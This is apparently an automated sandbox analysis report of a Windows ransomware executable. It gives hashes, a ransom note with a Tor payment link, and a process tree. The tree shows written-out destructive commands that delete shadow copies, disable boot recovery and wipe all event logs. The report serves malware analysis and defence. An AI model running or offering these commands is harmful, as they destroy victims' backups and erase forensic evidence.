Resubmissions
19-01-2023 10:17
230119-mbpsksff79 1014-11-2022 04:26
221114-e2qhsseg47 1020-01-2022 19:02
220120-xptc2abbh7 10Analysis
-
max time kernel
42s -
max time network
45s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
14-11-2022 04:26
Behavioral task
behavioral1
Sample
c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe
Resource
win10v2004-20220812-en
General
-
Target
c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe
-
Size
2.9MB
-
MD5
ccde3fe374a219ed3a85a0bf548542c3
-
SHA1
c1187fe0eaddee995773d6c66bcb558536e9b62c
-
SHA256
c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40
-
SHA512
94852c04d6f627b35a7486de166648eb43373850b862e1958e676c53fd5dc37103659fe28e2b51f2fffd815ded2745d8793d8158543ff14b1e1f0cafe2a3c63c
-
SSDEEP
49152:4dwE1vCCeShiBHJFIPiEPE3bvk6Ca89388YhwjfJNt/RgaJ2wtb:WwE1253IPiYE3bnCa8Hzj5vwwtb
Malware Config
Extracted
C:\RECOVER-mfqssdj-FILES.txt
http://b4twqa2mvob3s6uvuyfra5xk3qgps2v5kkt7k2qnb7rpdu3j4fkntead.onion/?access-key=RrffeR4CVartLMYTErq9%2FPVD%2Fz4sez5toskePW0P8urvDeotAomkbpUCg6JYW4MMxbX73YDPXMk3wQW0oSYnXGy5aGuT9ZPXpJKPaE6kYN9nNcxMBi92FcIv80rEpVUY9S5ukN796JGSdG%2BeWBVgx6nvw2vlhogyu35Ht2Iz6r6Zcc4J4mdX6RuzKXu5eny7saSaH0LMN6GYnIUfTF5UMR%2BtUchaTLOHyU5i1FnYeueodio9ECm8BgQ5Hbb3%2BIWlgrlEf4htHAwvPwCn2ld8lheacG87vkFKekfFCGErE5lNgNr12JSohBq1tH%2B3O8gw%2FG86wBsC46qR82KshQKpzQ%3D%3D
Signatures
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 1760 bcdedit.exe 1692 bcdedit.exe -
Modifies extensions of user files 5 IoCs
Ransomware generally changes the extension on encrypted files.
description ioc Process File opened for modification C:\Users\Admin\Pictures\CopyConnect.tiff c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe File renamed C:\Users\Admin\Pictures\AddMerge.png => C:\Users\Admin\Pictures\AddMerge.png.mfqssdj c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe File opened for modification C:\Users\Admin\Pictures\AddMerge.png.mfqssdj c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe File renamed C:\Users\Admin\Pictures\CopyConnect.tiff => C:\Users\Admin\Pictures\CopyConnect.tiff.mfqssdj c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe File opened for modification C:\Users\Admin\Pictures\CopyConnect.tiff.mfqssdj c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe -
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\Z: c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe -
Sets desktop wallpaper using registry 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Control Panel\Desktop\WallPaper = "C:\\Users\\Admin\\Desktop\\RECOVER-mfqssdj-FILES.txt.png" c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe Set value (str) \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\RECOVER-mfqssdj-FILES.txt.png" c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe -
Interacts with shadow copies 2 TTPs 2 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1908 vssadmin.exe 1216 vssadmin.exe -
Modifies Control Panel 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Control Panel\Desktop\WallpaperStyle = "0" c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe -
Suspicious behavior: EnumeratesProcesses 31 IoCs
pid Process 1112 c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe 1112 c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe 1112 c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe 1112 c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe 1112 c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe 1112 c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe 1112 c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe 1112 c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe 1112 c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe 1112 c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe 1112 c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe 1112 c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe 1112 c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe 1112 c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe 1112 c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe 1112 c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe 1112 c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe 1112 c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe 1112 c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe 1112 c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe 1112 c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe 1112 c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe 1112 c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe 1112 c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe 1112 c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe 1112 c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe 1112 c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe 1112 c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe 1112 c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe 1112 c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe 1112 c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 916 WMIC.exe Token: SeSecurityPrivilege 916 WMIC.exe Token: SeTakeOwnershipPrivilege 916 WMIC.exe Token: SeLoadDriverPrivilege 916 WMIC.exe Token: SeSystemProfilePrivilege 916 WMIC.exe Token: SeSystemtimePrivilege 916 WMIC.exe Token: SeProfSingleProcessPrivilege 916 WMIC.exe Token: SeIncBasePriorityPrivilege 916 WMIC.exe Token: SeCreatePagefilePrivilege 916 WMIC.exe Token: SeBackupPrivilege 916 WMIC.exe Token: SeRestorePrivilege 916 WMIC.exe Token: SeShutdownPrivilege 916 WMIC.exe Token: SeDebugPrivilege 916 WMIC.exe Token: SeSystemEnvironmentPrivilege 916 WMIC.exe Token: SeRemoteShutdownPrivilege 916 WMIC.exe Token: SeUndockPrivilege 916 WMIC.exe Token: SeManageVolumePrivilege 916 WMIC.exe Token: 33 916 WMIC.exe Token: 34 916 WMIC.exe Token: 35 916 WMIC.exe Token: SeIncreaseQuotaPrivilege 916 WMIC.exe Token: SeSecurityPrivilege 916 WMIC.exe Token: SeTakeOwnershipPrivilege 916 WMIC.exe Token: SeLoadDriverPrivilege 916 WMIC.exe Token: SeSystemProfilePrivilege 916 WMIC.exe Token: SeSystemtimePrivilege 916 WMIC.exe Token: SeProfSingleProcessPrivilege 916 WMIC.exe Token: SeIncBasePriorityPrivilege 916 WMIC.exe Token: SeCreatePagefilePrivilege 916 WMIC.exe Token: SeBackupPrivilege 916 WMIC.exe Token: SeRestorePrivilege 916 WMIC.exe Token: SeShutdownPrivilege 916 WMIC.exe Token: SeDebugPrivilege 916 WMIC.exe Token: SeSystemEnvironmentPrivilege 916 WMIC.exe Token: SeRemoteShutdownPrivilege 916 WMIC.exe Token: SeUndockPrivilege 916 WMIC.exe Token: SeManageVolumePrivilege 916 WMIC.exe Token: 33 916 WMIC.exe Token: 34 916 WMIC.exe Token: 35 916 WMIC.exe Token: SeIncreaseQuotaPrivilege 1112 c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe Token: SeSecurityPrivilege 1112 c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe Token: SeTakeOwnershipPrivilege 1112 c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe Token: SeLoadDriverPrivilege 1112 c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe Token: SeSystemProfilePrivilege 1112 c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe Token: SeSystemtimePrivilege 1112 c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe Token: SeProfSingleProcessPrivilege 1112 c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe Token: SeIncBasePriorityPrivilege 1112 c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe Token: SeCreatePagefilePrivilege 1112 c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe Token: SeBackupPrivilege 1112 c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe Token: SeRestorePrivilege 1112 c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe Token: SeShutdownPrivilege 1112 c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe Token: SeDebugPrivilege 1112 c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe Token: SeSystemEnvironmentPrivilege 1112 c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe Token: SeChangeNotifyPrivilege 1112 c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe Token: SeRemoteShutdownPrivilege 1112 c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe Token: SeUndockPrivilege 1112 c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe Token: SeManageVolumePrivilege 1112 c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe Token: SeImpersonatePrivilege 1112 c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe Token: SeCreateGlobalPrivilege 1112 c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe Token: 33 1112 c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe Token: 34 1112 c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe Token: 35 1112 c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe Token: SeIncreaseQuotaPrivilege 764 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1112 wrote to memory of 1780 1112 c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe 28 PID 1112 wrote to memory of 1780 1112 c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe 28 PID 1112 wrote to memory of 1780 1112 c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe 28 PID 1112 wrote to memory of 1780 1112 c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe 28 PID 1780 wrote to memory of 916 1780 cmd.exe 30 PID 1780 wrote to memory of 916 1780 cmd.exe 30 PID 1780 wrote to memory of 916 1780 cmd.exe 30 PID 1780 wrote to memory of 916 1780 cmd.exe 30 PID 1112 wrote to memory of 1764 1112 c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe 32 PID 1112 wrote to memory of 1764 1112 c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe 32 PID 1112 wrote to memory of 1764 1112 c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe 32 PID 1112 wrote to memory of 1764 1112 c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe 32 PID 1764 wrote to memory of 1412 1764 cmd.exe 34 PID 1764 wrote to memory of 1412 1764 cmd.exe 34 PID 1764 wrote to memory of 1412 1764 cmd.exe 34 PID 1764 wrote to memory of 1412 1764 cmd.exe 34 PID 1112 wrote to memory of 1416 1112 c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe 35 PID 1112 wrote to memory of 1416 1112 c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe 35 PID 1112 wrote to memory of 1416 1112 c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe 35 PID 1112 wrote to memory of 1416 1112 c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe 35 PID 1416 wrote to memory of 300 1416 cmd.exe 37 PID 1416 wrote to memory of 300 1416 cmd.exe 37 PID 1416 wrote to memory of 300 1416 cmd.exe 37 PID 1416 wrote to memory of 300 1416 cmd.exe 37 PID 1112 wrote to memory of 828 1112 c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe 38 PID 1112 wrote to memory of 828 1112 c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe 38 PID 1112 wrote to memory of 828 1112 c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe 38 PID 1112 wrote to memory of 828 1112 c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe 38 PID 1112 wrote to memory of 1364 1112 c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe 39 PID 1112 wrote to memory of 1364 1112 c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe 39 PID 1112 wrote to memory of 1364 1112 c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe 39 PID 1112 wrote to memory of 1364 1112 c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe 39 PID 1112 wrote to memory of 864 1112 c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe 42 PID 1112 wrote to memory of 864 1112 c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe 42 PID 1112 wrote to memory of 864 1112 c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe 42 PID 1112 wrote to memory of 864 1112 c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe 42 PID 864 wrote to memory of 1908 864 cmd.exe 45 PID 864 wrote to memory of 1908 864 cmd.exe 45 PID 864 wrote to memory of 1908 864 cmd.exe 45 PID 1364 wrote to memory of 1372 1364 cmd.exe 44 PID 1364 wrote to memory of 1372 1364 cmd.exe 44 PID 1364 wrote to memory of 1372 1364 cmd.exe 44 PID 1364 wrote to memory of 1372 1364 cmd.exe 44 PID 1112 wrote to memory of 1972 1112 c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe 46 PID 1112 wrote to memory of 1972 1112 c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe 46 PID 1112 wrote to memory of 1972 1112 c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe 46 PID 1112 wrote to memory of 1972 1112 c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe 46 PID 1972 wrote to memory of 1808 1972 cmd.exe 49 PID 1972 wrote to memory of 1808 1972 cmd.exe 49 PID 1972 wrote to memory of 1808 1972 cmd.exe 49 PID 1972 wrote to memory of 1808 1972 cmd.exe 49 PID 396 wrote to memory of 1932 396 c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe 51 PID 396 wrote to memory of 1932 396 c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe 51 PID 396 wrote to memory of 1932 396 c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe 51 PID 396 wrote to memory of 1932 396 c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe 51 PID 1932 wrote to memory of 764 1932 cmd.exe 53 PID 1932 wrote to memory of 764 1932 cmd.exe 53 PID 1932 wrote to memory of 764 1932 cmd.exe 53 PID 1932 wrote to memory of 764 1932 cmd.exe 53 PID 1112 wrote to memory of 1736 1112 c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe 55 PID 1112 wrote to memory of 1736 1112 c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe 55 PID 1112 wrote to memory of 1736 1112 c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe 55 PID 1112 wrote to memory of 1736 1112 c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe 55 PID 1736 wrote to memory of 1904 1736 cmd.exe 57
Processes
-
C:\Users\Admin\AppData\Local\Temp\c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exeC:\Users\Admin\AppData\Local\Temp\c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe --access-token 123451⤵
- Modifies extensions of user files
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Modifies Control Panel
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1112 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "wmic csproduct get UUID"2⤵
- Suspicious use of WriteProcessMemory
PID:1780 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic csproduct get UUID3⤵
- Suspicious use of AdjustPrivilegeToken
PID:916
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "fsutil behavior set SymlinkEvaluation R2L:1"2⤵
- Suspicious use of WriteProcessMemory
PID:1764 -
C:\Windows\SysWOW64\fsutil.exefsutil behavior set SymlinkEvaluation R2L:13⤵PID:1412
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "fsutil behavior set SymlinkEvaluation R2R:1"2⤵
- Suspicious use of WriteProcessMemory
PID:1416 -
C:\Windows\SysWOW64\fsutil.exefsutil behavior set SymlinkEvaluation R2R:13⤵PID:300
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "iisreset.exe /stop"2⤵PID:828
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters /v MaxMpxCt /d 65535 /t REG_DWORD /f"2⤵
- Suspicious use of WriteProcessMemory
PID:1364 -
C:\Windows\SysWOW64\reg.exereg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters /v MaxMpxCt /d 65535 /t REG_DWORD /f3⤵PID:1372
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "vssadmin.exe Delete Shadows /all /quiet"2⤵
- Suspicious use of WriteProcessMemory
PID:864 -
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:1908
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "arp -a"2⤵
- Suspicious use of WriteProcessMemory
PID:1972 -
C:\Windows\SysWOW64\ARP.EXEarp -a3⤵PID:1808
-
-
-
C:\Users\Admin\AppData\Local\Temp\c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe"C:\Users\Admin\AppData\Local\Temp\c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe" --child --access-token 123452⤵
- Suspicious use of WriteProcessMemory
PID:396 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "wmic csproduct get UUID"3⤵
- Suspicious use of WriteProcessMemory
PID:1932 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic csproduct get UUID4⤵
- Suspicious use of AdjustPrivilegeToken
PID:764
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "wmic.exe Shadowcopy Delete"2⤵
- Suspicious use of WriteProcessMemory
PID:1736 -
C:\Windows\System32\Wbem\WMIC.exewmic.exe Shadowcopy Delete3⤵PID:1904
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "bcdedit /set {default}"2⤵PID:1100
-
C:\Windows\system32\bcdedit.exebcdedit /set {default}3⤵
- Modifies boot configuration data using bcdedit
PID:1760
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "bcdedit /set {default} recoveryenabled No"2⤵PID:696
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:1692
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "cmd.exe /c for /F \"tokens=*\" %1 in ('wevtutil.exe el') DO wevtutil.exe cl \"%1\""2⤵PID:932
-
C:\Windows\system32\cmd.execmd.exe /c for /F \"tokens=*\" %1 in ('wevtutil.exe el') DO wevtutil.exe cl \"%1\"3⤵PID:1016
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "vssadmin.exe Delete Shadows /all /quiet"2⤵PID:232
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:1216
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "wmic.exe Shadowcopy Delete"2⤵PID:1904
-
C:\Windows\System32\Wbem\WMIC.exewmic.exe Shadowcopy Delete3⤵PID:1972
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "cmd.exe /c for /F \"tokens=*\" %1 in ('wevtutil.exe el') DO wevtutil.exe cl \"%1\""2⤵PID:1692
-
C:\Windows\system32\cmd.execmd.exe /c for /F \"tokens=*\" %1 in ('wevtutil.exe el') DO wevtutil.exe cl \"%1\"3⤵PID:472
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:576
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:1508